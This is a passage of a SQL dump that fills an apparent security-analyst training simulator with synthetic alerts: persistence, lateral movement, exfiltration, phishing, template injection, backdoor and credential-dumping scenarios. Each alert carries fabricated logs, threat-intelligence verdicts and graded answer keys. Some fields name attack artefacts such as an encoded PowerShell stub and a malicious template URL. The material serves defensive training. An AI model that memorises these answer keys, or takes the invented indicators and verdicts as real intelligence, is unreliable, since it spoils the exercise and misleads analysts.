Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value 
Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value 
Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1293, 'Lateral Movement Identified Across Network', 'high', 'Network traffic analysis', 'The threat actor leverages compromised credentials to move laterally within the network, expanding their reach to additional systems of interest. Detected suspicious network activity indicating lateral movement from an internal host to another internal host using compromised credentials. The record shows an SMB connection attempt from 10.0.2.15 to 192.168.1.45 as j.doe involving credentials.txt, with 203.0.113.5 recorded as the external address; the log captures only a connection attempt, not a confirmed session, so whether the move succeeded should be verified on 192.168.1.45 before that host is treated as compromised, and the j.doe credentials should be reset either way.', 'Lateral Movement', 'T1021', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"LM-47382\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"192.168.1.45\",\"protocol\":\"SMB\",\"username\":\"j.doe\",\"filename\":\"credentials.txt\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"external_ip\":\"203.0.113.5\",\"action\":\"connection_attempt\"}', '2026-02-24 03:15:13', '2026-02-25 10:32:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping 
malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1294, 'Data Exfiltration via Dropbox API', 'critical', 'Cloud service monitoring', 'An advanced attacker leveraged the Dropbox API to exfiltrate sensitive audio data from compromised PCs to a remote server. This step marks the culmination of their operation, using eavesdropped audio files from the organization. The log records a successful 10485760-byte upload of audio_recording_20231015.wav by compromised_user from 10.10.15.23, but lists the destination as 203.0.113.45 (malicious-server.com) rather than Dropbox infrastructure; the api_service field should be corroborated against proxy and DNS logs before concluding the upload went through Dropbox, and blocking 203.0.113.45 alone will not stop further uploads to the legitimate Dropbox service.', 'Exfiltration', 'T1567.002 - Exfiltration Over Web Service', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"EXF-20231015-001\",\"source_ip\":\"10.10.15.23\",\"destination_ip\":\"203.0.113.45\",\"user\":\"compromised_user\",\"filename\":\"audio_recording_20231015.wav\",\"hash\":\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\",\"api_service\":\"Dropbox\",\"status\":\"Upload successful\",\"bytes_transferred\":10485760,\"external_server\":\"malicious-server.com\"}', '2026-02-24 03:15:13', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration endpoint associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Identified as a local machine within the organization\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"audio_recording_20231015.wav\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Tools\",\"verdict\":\"suspicious\",\"details\":\"Unusual file exfiltrated through Dropbox API.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Hash Repository\",\"verdict\":\"suspicious\",\"details\":\"Hash not seen in any known clean 
samples.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1295, 'Suspicious Email Delivery', 'high', 'Email Gateway Logs', 'A spear-phishing campaign targeting Ukrainian government entities has been detected. The emails contain malicious attachments designed to exploit vulnerabilities in document readers.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-13T08:45:00Z\",\"source_ip\":\"185.92.220.25\",\"destination_ip\":\"192.168.15.45\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"target@ukrgov.ua\",\"subject\":\"Urgent Update Required\",\"attachment\":\"urgent_update.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"Delivered\",\"policy\":\"Allow\"}', '2026-02-24 03:16:14', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in document exploits\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Delivery\",\"date\":\"2026-02-24T04:22:04.758Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1296, 'Template Injection Detected', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the malicious document, template injection is used to execute remote macros, allowing the attackers to deploy further payloads undetected.', 'Code Injection', 'T1221 - Template Injection', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"event_id\":\"EDR-20231025-0001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"filename\":\"invoice_2023.docx\",\"detected_template_url\":\"http://malicious-site.com/template.dotm\",\"user\":\"jdoe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"process_name\":\"WINWORD.EXE\",\"host\":\"DESKTOP-5G7HJL8\",\"detected_malicious_macro\":true,\"action_taken\":\"blocked\"}', '2026-02-24 03:16:14', '2026-02-24 15:32:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Potentially malicious document used for template injection\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious document\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious-site.com/template.dotm\",\"is_critical\":true,\"osint_result\":{\"source\":\"url_reputation\",\"verdict\":\"malicious\",\"details\":\"URL 
hosting malicious template for injection\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_directory\",\"verdict\":\"clean\",\"details\":\"User account involved in the incident\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1297, 'Establishing Persistence - Backdoor Installation', 'critical', 'System Logs', 'The attackers have installed a custom backdoor linked to known Gamaredon toolsets to ensure continued access to the compromised network. The backdoor was executed under the username \'admin_user\' on the host \'compromised_host\', with the file \'gamaredon_backdoor.exe\' identified by the hash \'d41d8cd98f00b204e9800998ecf8427e\'. The malicious activity was linked to the external IP address \'185.220.101.1\'.', 'Backdoor Installation', 'T1547 - Boot or Logon Autostart Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:33:22Z\",\"event_id\":\"4625\",\"source_ip\":\"185.220.101.1\",\"internal_ip\":\"192.168.1.25\",\"username\":\"admin_user\",\"host\":\"compromised_host\",\"executable\":\"gamaredon_backdoor.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"installation\",\"status\":\"success\"}', '2026-02-24 03:16:14', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.220.101.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Gamaredon backdoor malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"gamaredon_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable identified as a backdoor tool used by Gamaredon group.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Username of a legitimate user on the 
network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1298, 'Credential Harvesting', 'high', 'Active Directory Logs', 'With persistence achieved, the attackers focus on gathering credentials to facilitate lateral movement across the network, targeting key administrative accounts.', 'Credential Dumping', 'T1003 - Credential Dumping', 1, 'resolved', NULL, '{\"eventID\":\"4625\",\"timestamp\":\"2023-09-15T14:23:12Z\",\"logonType\":\"10\",\"sourceIP\":\"203.0.113.45\",\"affectedUser\":\"admin_user@company.local\",\"targetMachine\":\"192.168.1.15\",\"fileAccessed\":\"C:\\\\Windows\\\\System32\\\\config\\\\SAM\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"processName\":\"lsass.exe\",\"status\":\"Failed logon attempt\",\"additionalInfo\":{\"attemptedCredentialDump\":true,\"persistenceDetected\":true}}', '2026-02-24 03:16:14', '2026-02-24 15:33:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple credential dumping incidents.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user@company.local\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Key administrative account targeted for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, 
